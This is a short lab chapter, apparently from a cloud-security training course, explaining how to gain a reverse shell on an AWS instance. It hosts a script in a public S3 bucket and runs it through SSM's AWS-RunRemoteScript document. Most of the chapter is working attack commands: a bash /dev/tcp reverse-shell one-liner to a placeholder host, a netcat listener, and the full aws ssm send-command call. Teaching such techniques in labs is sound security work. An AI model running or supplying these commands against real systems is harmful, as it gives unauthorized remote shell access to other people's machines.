Gaining a shell using a hosted script


As we can use SSM to execute commands, we can use it to obtain a shell on the remote system. Using the AWS-RunRemoteScript document we can execute a script hosted either on Github or an S3 bucket.

What are we going to cover?

This chapter covers the capability of AWS SSM to pull a script hosted on the Internet and execute it on the target. We will use this to gain a reverse shell.

Steps to achieve this (DEMO)

  • Run these commands from the student machine.

  • Create a S3 bucket, give it any name and upload the following as to the bucket

bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
  • Make the file public

  • On the machine where you will catch the reverse shell, start netcat

nc -lvp 9999

  • Run the following command with the shell script S3 bucket path and the instance ID of the machine on which you want a reverse shell

aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"

  • A reverse shell will have connected to the netcat listener

Additional references

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